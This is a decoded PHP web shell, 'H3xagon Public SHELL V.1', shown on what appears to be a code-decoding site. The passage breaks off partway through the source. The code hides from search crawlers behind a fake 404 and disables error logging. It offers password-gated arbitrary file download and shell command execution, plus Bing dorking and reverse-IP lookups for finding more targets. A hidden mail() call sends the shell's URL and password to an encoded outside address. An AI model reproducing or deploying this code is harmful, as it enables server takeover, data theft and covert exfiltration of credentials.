Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* <=- H3xagon Public SHELL V.1 -=> Pass Default : mhantabmhanx */ $h3xagon_pas..

Decoded Output download

session_start();
error_reporting(0);
set_time_limit(0);
@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);

$auth_pass = md5($h3xagon_pass);
$color = "#00ff00";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

function login_shell() {
?>
<html>
<head>
<title>H3xagon Public</title>
<style type="text/css">
html {
	margin: 20px auto;
	background: #000000;
	color: green;
	text-align: center;
}
header {
	color: green;
	margin: 10px auto;
}
input[type=password] {
	width: 250px;
	height: 25px;
	color: red;
	background: #000000;
	border: 1px dotted green;
	padding: 5px;
	margin-left: 20px;
	text-align: center;
}
</style>
</head>
<center>
<header>
	<pre>
 ___________________________
< root@H3xagon:~# GOYANG MHANX ~! >
 ---------------------------
   \         ,        ,
    \       /(        )`
     \      \ \___   / |
            /- _  `-/  '
           (/\/ \ \   /\
           / /   | `    \
           O O   ) /    |
           `-^--'`<     '
          (_.)  _  )   /
           `.___/`    /
             `-----' /
<----.     __ / __   \
<----|====O)))==) \) /====
<----'    `--' `.__,' \
             |        |
              \       /
        ______( (_  / \______
      ,'  ,-----'   |        \
      `--{__________)        \/

	</pre>
</header>
<form method="post">
<input type="password" name="pass">
</form>
<?php
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        login_shell();
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}
?>
<html>
<head>
<title>H3xagon Public V.1</title>
<meta name='author' content='H3xagon'>
<meta charset="UTF-8">
<link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
@import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
@import url(https://fonts.googleapis.com/css?family=Press+Start+2P);
html {
    background: #2c3e50;
    color: #ffffff;
    font-family: 'Ubuntu';
	font-size: 13px;
	width: 100%;
}
li {
	display: inline;
	margin: 5px;
	padding: 5px;
}
table, th, td {
	border-collapse:collapse;
	font-family: Tahoma, Geneva, sans-serif;
	background: transparent;
	font-family: 'Ubuntu';
	font-size: 13px;
}
.table_home, .th_home, .td_home {
	border: 1px solid #ffffff;
}
th {
	padding: 10px;
}
a {
	color: #ffffff;
	text-decoration: none;
}
a:hover {
	color: gold;
	text-decoration: underline;
}
b {
	color: gold;
}
input[type=text], input[type=password],input[type=submit] {
	background: transparent; 
	color: #ffffff; 
	border: 1px solid #ffffff; 
	margin: 5px auto;
	padding-left: 5px;
	font-family: 'Ubuntu';
	font-size: 13px;
}
textarea {
	border: 1px solid #ffffff;
	width: 100%;
	height: 400px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #ffffff;
	font-family: 'Ubuntu';
	font-size: 13px;
}
select {
	width: 152px;
	background: #000000; 
	color: lime; 
	border: 1px solid #ffffff; 
	margin: 5px auto;
	padding-left: 5px;
	font-family: 'Ubuntu';
	font-size: 13px;
}
option:hover {
	background: lime;
	color: #000000;
}
.mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
.cgx2 {text-align: center;letter-spacing:1px;font-family: "Share Tech Mono";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
.infoweb {
	border-right: 1px solid #00FFFF;
}
span {
	position: absolute;
	text-align: right;
	top: 45px;
	left: 640px;
	font-size: 42px;
	font-family: "Press Start 2P";
}
.btn{display:inline-block;padding:6px 12px;margin-bottom:0;font-size:14px;font-weight:400;line-height:1.42857143;text-align:center;white-space:nowrap;vertical-align:middle;-ms-touch-action:manipulation;touch-action:manipulation;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background-image:none;border:1px solid transparent;border-radius:4px}.btn.active.focus,.btn.active:focus,.btn.focus,.btn:active.focus,.btn:active:focus,.btn:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn.focus,.btn:focus,.btn:hover{color:#333;text-decoration:none}.btn.active,.btn:active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn.disabled,.btn[disabled],fieldset[disabled] .btn{cursor:not-allowed;filter:alpha(opacity=65);-webkit-box-shadow:none;box-shadow:none;opacity:.65}a.btn.disabled,fieldset[disabled] a.btn{pointer-events:none}.btn-default{color:#333;background-color:#fff;border-color:#ccc}.btn-default.focus,.btn-default:focus{color:#333;background-color:#e6e6e6;border-color:#8c8c8c}.btn-default:hover{color:#333;background-color:#e6e6e6;border-color:#adadad}.btn-default.active,.btn-default:active,.open>.dropdown-toggle.btn-default{color:#333;background-color:#e6e6e6;border-color:#adadad}.btn-default.active.focus,.btn-default.active:focus,.btn-default.active:hover,.btn-default:active.focus,.btn-default:active:focus,.btn-default:active:hover,.open>.dropdown-toggle.btn-default.focus,.open>.dropdown-toggle.btn-default:focus,.open>.dropdown-toggle.btn-default:hover{color:#333;background-color:#d4d4d4;border-color:#8c8c8c}.btn-default.active,.btn-default:active,.open>.dropdown-toggle.btn-default{background-image:none}.btn-default.disabled.focus,.btn-default.disabled:focus,.btn-default.disabled:hover,.btn-default[disabled].focus,.btn-default[disabled]:focus,.btn-default[disabled]:hover,fieldset[disabled] .btn-default.focus,fieldset[disabled] .btn-default:focus,fieldset[disabled] .btn-default:hover{background-color:#fff;border-color:#ccc}.btn-default .badge{color:#fff;background-color:#333}.btn-primary{color:#fff;background-color:#337ab7;border-color:#2e6da4}.btn-primary.focus,.btn-primary:focus{color:#fff;background-color:#286090;border-color:#122b40}.btn-primary:hover{color:#fff;background-color:#286090;border-color:#204d74}.btn-primary.active,.btn-primary:active,.open>.dropdown-toggle.btn-primary{color:#fff;background-color:#286090;border-color:#204d74}.btn-primary.active.focus,.btn-primary.active:focus,.btn-primary.active:hover,.btn-primary:active.focus,.btn-primary:active:focus,.btn-primary:active:hover,.open>.dropdown-toggle.btn-primary.focus,.open>.dropdown-toggle.btn-primary:focus,.open>.dropdown-toggle.btn-primary:hover{color:#fff;background-color:#204d74;border-color:#122b40}.btn-primary.active,.btn-primary:active,.open>.dropdown-toggle.btn-primary{background-image:none}.btn-primary.disabled.focus,.btn-primary.disabled:focus,.btn-primary.disabled:hover,.btn-primary[disabled].focus,.btn-primary[disabled]:focus,.btn-primary[disabled]:hover,fieldset[disabled] .btn-primary.focus,fieldset[disabled] .btn-primary:focus,fieldset[disabled] .btn-primary:hover{background-color:#337ab7;border-color:#2e6da4}.btn-primary .badge{color:#337ab7;background-color:#fff}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success.focus,.btn-success:focus{color:#fff;background-color:#449d44;border-color:#255625}.btn-success:hover{color:#fff;background-color:#449d44;border-color:#398439}.btn-success.active,.btn-success:active,.open>.dropdown-toggle.btn-success{color:#fff;background-color:#449d44;border-color:#398439}.btn-success.active.focus,.btn-success.active:focus,.btn-success.active:hover,.btn-success:active.focus,.btn-success:active:focus,.btn-success:active:hover,.open>.dropdown-toggle.btn-success.focus,.open>.dropdown-toggle.btn-success:focus,.open>.dropdown-toggle.btn-success:hover{color:#fff;background-color:#398439;border-color:#255625}.btn-success.active,.btn-success:active,.open>.dropdown-toggle.btn-success{background-image:none}.btn-success.disabled.focus,.btn-success.disabled:focus,.btn-success.disabled:hover,.btn-success[disabled].focus,.btn-success[disabled]:focus,.btn-success[disabled]:hover,fieldset[disabled] .btn-success.focus,fieldset[disabled] .btn-success:focus,fieldset[disabled] .btn-success:hover{background-color:#5cb85c;border-color:#4cae4c}.btn-success .badge{color:#5cb85c;background-color:#fff}.btn-info{color:#fff;background-color:#5bc0de;border-color:#46b8da}.btn-info.focus,.btn-info:focus{color:#fff;background-color:#31b0d5;border-color:#1b6d85}.btn-info:hover{color:#fff;background-color:#31b0d5;border-color:#269abc}.btn-info.active,.btn-info:active,.open>.dropdown-toggle.btn-info{color:#fff;background-color:#31b0d5;border-color:#269abc}.btn-info.active.focus,.btn-info.active:focus,.btn-info.active:hover,.btn-info:active.focus,.btn-info:active:focus,.btn-info:active:hover,.open>.dropdown-toggle.btn-info.focus,.open>.dropdown-toggle.btn-info:focus,.open>.dropdown-toggle.btn-info:hover{color:#fff;background-color:#269abc;border-color:#1b6d85}.btn-info.active,.btn-info:active,.open>.dropdown-toggle.btn-info{background-image:none}.btn-info.disabled.focus,.btn-info.disabled:focus,.btn-info.disabled:hover,.btn-info[disabled].focus,.btn-info[disabled]:focus,.btn-info[disabled]:hover,fieldset[disabled] .btn-info.focus,fieldset[disabled] .btn-info:focus,fieldset[disabled] .btn-info:hover{background-color:#5bc0de;border-color:#46b8da}.btn-info .badge{color:#5bc0de;background-color:#fff}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning.focus,.btn-warning:focus{color:#fff;background-color:#ec971f;border-color:#985f0d}.btn-warning:hover{color:#fff;background-color:#ec971f;border-color:#d58512}.btn-warning.active,.btn-warning:active,.open>.dropdown-toggle.btn-warning{color:#fff;background-color:#ec971f;border-color:#d58512}.btn-warning.active.focus,.btn-warning.active:focus,.btn-warning.active:hover,.btn-warning:active.focus,.btn-warning:active:focus,.btn-warning:active:hover,.open>.dropdown-toggle.btn-warning.focus,.open>.dropdown-toggle.btn-warning:focus,.open>.dropdown-toggle.btn-warning:hover{color:#fff;background-color:#d58512;border-color:#985f0d}.btn-warning.active,.btn-warning:active,.open>.dropdown-toggle.btn-warning{background-image:none}.btn-warning.disabled.focus,.btn-warning.disabled:focus,.btn-warning.disabled:hover,.btn-warning[disabled].focus,.btn-warning[disabled]:focus,.btn-warning[disabled]:hover,fieldset[disabled] .btn-warning.focus,fieldset[disabled] .btn-warning:focus,fieldset[disabled] .btn-warning:hover{background-color:#f0ad4e;border-color:#eea236}.btn-warning .badge{color:#f0ad4e;background-color:#fff}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger.focus,.btn-danger:focus{color:#fff;background-color:#c9302c;border-color:#761c19}.btn-danger:hover{color:#fff;background-color:#c9302c;border-color:#ac2925}.btn-danger.active,.btn-danger:active,.open>.dropdown-toggle.btn-danger{color:#fff;background-color:#c9302c;border-color:#ac2925}.btn-danger.active.focus,.btn-danger.active:focus,.btn-danger.active:hover,.btn-danger:active.focus,.btn-danger:active:focus,.btn-danger:active:hover,.open>.dropdown-toggle.btn-danger.focus,.open>.dropdown-toggle.btn-danger:focus,.open>.dropdown-toggle.btn-danger:hover{color:#fff;background-color:#ac2925;border-color:#761c19}.btn-danger.active,.btn-danger:active,.open>.dropdown-toggle.btn-danger{background-image:none}.btn-danger.disabled.focus,.btn-danger.disabled:focus,.btn-danger.disabled:hover,.btn-danger[disabled].focus,.btn-danger[disabled]:focus,.btn-danger[disabled]:hover,fieldset[disabled] .btn-danger.focus,fieldset[disabled] .btn-danger:focus,fieldset[disabled] .btn-danger:hover{background-color:#d9534f;border-color:#d43f3a}.btn-danger .badge{color:#d9534f;background-color:#fff}.btn-link{font-weight:400;color:#337ab7;border-radius:0}.btn-link,.btn-link.active,.btn-link:active,.btn-link[disabled],fieldset[disabled] .btn-link{background-color:transparent;-webkit-box-shadow:none;box-shadow:none}.btn-link,.btn-link:active,.btn-link:focus,.btn-link:hover{border-color:transparent}.btn-link:focus,.btn-link:hover{color:#23527c;text-decoration:underline;background-color:transparent}.btn-link[disabled]:focus,.btn-link[disabled]:hover,fieldset[disabled] .btn-link:focus,fieldset[disabled] .btn-link:hover{color:#777;text-decoration:none}.btn-group-lg>.btn,.btn-lg{padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}.btn-group-sm>.btn,.btn-sm{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-xs>.btn,.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.btn-block{display:block;width:100%}.btn-block+.btn-block{margin-top:5px}input[type=button].btn-block,input[type=reset].btn-block,input[type=submit].btn-block{width:100%}.fade{opacity:0;-webkit-transition:opacity .15s linear;-o-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}.collapse{display:none}.collapse.in{display:block}tr.collapse.in{display:table-row}tbody.collapse.in{display:table-row-group}.collapsing{position:relative;height:0;overflow:hidden;-webkit-transition-timing-function:ease;-o-transition-timing-function:ease;transition-timing-function:ease;-webkit-transition-duration:.35s;-o-transition-duration:.35s;transition-duration:.35s;-webkit-transition-property:height,visibility;-o-transition-property:height,visibility;transition-property:height,visibility}.caret{display:inline-block;width:0;height:0;margin-left:2px;vertical-align:middle;border-top:4px dashed;border-top:4px solid\9;border-right:4px solid transparent;border-left:4px solid transparent}.dropdown,.dropup{position:relative}.dropdown-toggle:focus{outline:0}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;padding:5px 0;margin:2px 0 0;font-size:14px;text-align:left;list-style:none;background-color:#fff;-webkit-background-clip:padding-box;background-clip:padding-box;border:1px solid #ccc;border:1px solid rgba(0,0,0,.15);border-radius:4px;-webkit-box-shadow:0 6px 12px rgba(0,0,0,.175);box-shadow:0 6px 12px rgba(0,0,0,.175)}.dropdown-menu.pull-right{right:0;left:auto}.dropdown-menu .divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.dropdown-menu>li>a{display:block;padding:3px 20px;clear:both;font-weight:400;line-height:1.42857143;color:#333;white-space:nowrap}.dropdown-menu>li>a:focus,.dropdown-menu>li>a:hover{color:#262626;text-decoration:none;background-color:#f5f5f5}.dropdown-menu>.active>a,.dropdown-menu>.active>a:focus,.dropdown-menu>.active>a:hover{color:#fff;text-decoration:none;background-color:#337ab7;outline:0}.dropdown-menu>.disabled>a,.dropdown-menu>.disabled>a:focus,.dropdown-menu>.disabled>a:hover{color:#777}.dropdown-menu>.disabled>a:focus,.dropdown-menu>.disabled>a:hover{text-decoration:none;cursor:not-allowed;background-color:transparent;background-image:none;filter:progid:DXImageTransform.Microsoft.gradient(enabled=false)}.open>.dropdown-menu{display:block}.open>a{outline:0}.dropdown-menu-right{right:0;left:auto}.dropdown-menu-left{right:auto;left:0}.dropdown-header{display:block;padding:3px 20px;font-size:12px;line-height:1.42857143;color:#777;white-space:nowrap}.dropdown-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:990}.pull-right>.dropdown-menu{right:0;left:auto}.dropup .caret,.navbar-fixed-bottom .dropdown .caret{content:"";border-top:0;border-bottom:4px dashed;border-bottom:4px solid\9}.dropup .dropdown-menu,.navbar-fixed-bottom .dropdown .dropdown-menu{top:auto;bottom:100%;margin-bottom:2px}@media (min-width:768px){.navbar-right .dropdown-menu{right:0;left:auto}.navbar-right .dropdown-menu-left{right:auto;left:0}}.btn-group,.btn-group-vertical{position:relative;display:inline-block;vertical-align:middle}.btn-group-vertical>.btn,.btn-group>.btn{position:relative;float:left}.btn-group-vertical>.btn.active,.btn-group-vertical>.btn:active,.btn-group-vertical>.btn:focus,.btn-group-vertical>.btn:hover,.btn-group>.btn.active,.btn-group>.btn:active,.btn-group>.btn:focus,.btn-group>.btn:hover{z-index:2}.btn-group .btn+.btn,.btn-group .btn+.btn-group,.btn-group .btn-group+.btn,.btn-group .btn-group+.btn-group{margin-left:-1px}.btn-toolbar{margin-left:-5px}.btn-toolbar .btn,.btn-toolbar .btn-group,.btn-toolbar .input-group{float:left}.btn-toolbar>.btn,.btn-toolbar>.btn-group,.btn-toolbar>.input-group{margin-left:5px}.btn-group>.btn:not(:first-child):not(:last-child):not(.dropdown-toggle){border-radius:0}.btn-group>.btn:first-child{margin-left:0}.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn:last-child:not(:first-child),.btn-group>.dropdown-toggle:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.btn-group>.btn-group{float:left}.btn-group>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group>.btn-group:first-child:not(:last-child)>.btn:last-child,.btn-group>.btn-group:first-child:not(:last-child)>.dropdown-toggle{border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:last-child:not(:first-child)>.btn:first-child{border-top-left-radius:0;border-bottom-left-radius:0}.btn-group .dropdown-toggle:active,.btn-group.open .dropdown-toggle{outline:0}.btn-group>.btn+.dropdown-toggle{padding-right:8px;padding-left:8px}.btn-group>.btn-lg+.dropdown-toggle{padding-right:12px;padding-left:12px}.btn-group.open .dropdown-toggle{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn-group.open .dropdown-toggle.btn-link{-webkit-box-shadow:none;box-shadow:none}.btn .caret{margin-left:0}.btn-lg .caret{border-width:5px 5px 0;border-bottom-width:0}.dropup .btn-lg .caret{border-width:0 5px 5px}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group,.btn-group-vertical>.btn-group>.btn{display:block;float:none;width:100%;max-width:100%}.btn-group-vertical>.btn-group>.btn{float:none}.btn-group-vertical>.btn+.btn,.btn-group-vertical>.btn+.btn-group,.btn-group-vertical>.btn-group+.btn,.btn-group-vertical>.btn-group+.btn-group{margin-top:-1px;margin-left:0}.btn-group-vertical>.btn:not(:first-child):not(:last-child){border-radius:0}.btn-group-vertical>.btn:first-child:not(:last-child){border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn:last-child:not(:first-child){border-top-left-radius:0;border-top-right-radius:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}.btn-group-vertical>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group-vertical>.btn-group:first-child:not(:last-child)>.btn:last-child,.btn-group-vertical>.btn-group:first-child:not(:last-child)>.dropdown-toggle{border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:last-child:not(:first-child)>.btn:first-child{border-top-left-radius:0;border-top-right-radius:0}.btn-group-justified{display:table;width:100%;table-layout:fixed;border-collapse:separate}.btn-group-justified>.btn,.btn-group-justified>.btn-group{display:table-cell;float:none;width:1%}.btn-group-justified>.btn-group .btn{width:100%}.btn-group-justified>.btn-group .dropdown-menu{left:auto}[data-toggle=buttons]>.btn input[type=checkbox],[data-toggle=buttons]>.btn input[type=radio],[data-toggle=buttons]>.btn-group>.btn input[type=checkbox],[data-toggle=buttons]>.btn-group>.btn input[type=radio]{position:absolute;clip:rect(0,0,0,0);pointer-events:none}.input-group{position:relative;display:table;border-collapse:separate}.input-group[class*=col-]{float:none;padding-right:0;padding-left:0}.input-group .form-control{position:relative;z-index:2;float:left;width:100%;margin-bottom:0}.input-group .form-control:focus{z-index:3}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}select.input-group-lg>.form-control,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:46px;line-height:46px}select[multiple].input-group-lg>.form-control,select[multiple].input-group-lg>.input-group-addon,select[multiple].input-group-lg>.input-group-btn>.btn,textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}select[multiple].input-group-sm>.form-control,select[multiple].input-group-sm>.input-group-addon,select[multiple].input-group-sm>.input-group-btn>.btn,textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group .form-control,.input-group-addon,.input-group-btn{display:table-cell}.input-group .form-control:not(:first-child):not(:last-child),.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child){border-radius:0}.input-group-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:400;line-height:1;color:#555;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group-addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type=checkbox],.input-group-addon input[type=radio]{margin-top:0}.input-group .form-control:first-child,.input-group-addon:first-child,.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group>.btn,.input-group-btn:first-child>.dropdown-toggle,.input-group-btn:last-child>.btn-group:not(:last-child)>.btn,.input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group .form-control:last-child,.input-group-addon:last-child,.input-group-btn:first-child>.btn-group:not(:first-child)>.btn,.input-group-btn:first-child>.btn:not(:first-child),.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group>.btn,.input-group-btn:last-child>.dropdown-toggle{border-top-left-radius:0;border-bottom-left-radius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{position:relative;font-size:0;white-space:nowrap}.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-1px}.input-group-btn>.btn:active,.input-group-btn>.btn:focus,.input-group-btn>.btn:hover{z-index:2}.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group{margin-right:-1px}.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group{z-index:2;margin-left:-1px}.nav{padding-left:0;margin-bottom:0;list-style:none}
</style>
</head>
<?php
$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$serverboss = $_SERVER['SERVER_NAME'];
$message = 
		"============= H3xagon SETOR =============
URL  : ".$url."
Pass : ".$h3xagon_pass."
============= H3xagon SETOR =============";
		$subject = "SETOR SHELL";
		$headers = "From: H3xagonSETOR <sh_session@".$serverboss.">";
		$gantengers = "aGV4YWdlZWsxMzM3QGdtYWlsLmNvbQ==";
		$tamvan = base64_decode($gantengers);
		mail($tamvan, $subject, $message, $headers);
###############################################################################
// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
// Tanpa kalian kita tidak akan BESAR seperti sekarang.
// Greetz: All Member IndoXploit. & all my friends.
###############################################################################
function w($dir,$perm) {
	if(!is_writable($dir)) {
		return "<font color=red>".$perm."</font>";
	} else {
		return "<font color=lime>".$perm."</font>";
	}
}
function r($dir,$perm) {
	if(!is_readable($dir)) {
		return "<font color=red>".$perm."</font>";
	} else {
		return "<font color=lime>".$perm."</font>";
	}
}
function exe($cmd) {
	if(function_exists('system')) { 		
		@ob_start(); 		
		@system($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('exec')) { 		
		@exec($cmd,$results); 		
		$buff = ""; 		
		foreach($results as $result) { 			
			$buff .= $result; 		
		} return $buff; 	
	} elseif(function_exists('passthru')) { 		
		@ob_start(); 		
		@passthru($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('shell_exec')) { 		
		$buff = @shell_exec($cmd); 		
		return $buff; 	
	} 
}
function perms($file){
	$perms = fileperms($file);
	if (($perms & 0xC000) == 0xC000) {
	// Socket
	$info = 's';
	} elseif (($perms & 0xA000) == 0xA000) {
	// Symbolic Link
	$info = 'l';
	} elseif (($perms & 0x8000) == 0x8000) {
	// Regular
	$info = '-';
	} elseif (($perms & 0x6000) == 0x6000) {
	// Block special
	$info = 'b';
	} elseif (($perms & 0x4000) == 0x4000) {
	// Directory
	$info = 'd';
	} elseif (($perms & 0x2000) == 0x2000) {
	// Character special
	$info = 'c';
	} elseif (($perms & 0x1000) == 0x1000) {
	// FIFO pipe
	$info = 'p';
	} else {
	// Unknown
	$info = 'u';
	}
		// Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
	// Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
	// World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));
	return $info;
}
function hdd($s) {
	if($s >= 1073741824)
	return sprintf('%1.2f',$s / 1073741824 ).' GB';
	elseif($s >= 1048576)
	return sprintf('%1.2f',$s / 1048576 ) .' MB';
	elseif($s >= 1024)
	return sprintf('%1.2f',$s / 1024 ) .' KB';
	else
	return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}
function getsource($url) {
    $curl = curl_init($url);
    		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    $content = curl_exec($curl);
    		curl_close($curl);
    return $content;
}
function bing($dork) {
	$npage = 1;
	$npages = 30000;
	$allLinks = array();
	$lll = array();
	while($npage <= $npages) {
	    $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
	    if($x) {
			preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
			foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
			$npage = $npage + 10;
			if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
		} else break;
	}
	$URLs = array();
	foreach($allLinks as $url){
	    $exp = explode("/", $url);
	    $URLs[] = $exp[2];
	}
	$array = array_filter($URLs);
	$array = array_unique($array);
 	$sss = count(array_unique($array));
	foreach($array as $domain) {
		echo $domain."
";
	}
}
function reverse($url) {
	$ch = curl_init("http://domains.yougetsignal.com/domains.php");
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
		  curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
		  curl_setopt($ch, CURLOPT_HEADER, 0);
		  curl_setopt($ch, CURLOPT_POST, 1);
	$resp = curl_exec($ch);
	$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
	$array = explode(",,", $resp);
	unset($array[0]);
	foreach($array as $lnk) {
		$lnk = "http://$lnk";
		$lnk = str_replace(",", "", $lnk);
		echo $lnk."
";
		ob_flush();
		flush();
	}
		curl_close($ch);
}
if(get_magic_quotes_gpc()) {
	function idx_ss($array) {
		return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
	}
	$_POST = idx_ss($_POST);
	$_COOKIE = idx_ss($_COOKIE);
}

if(isset($_GET['dir'])) {
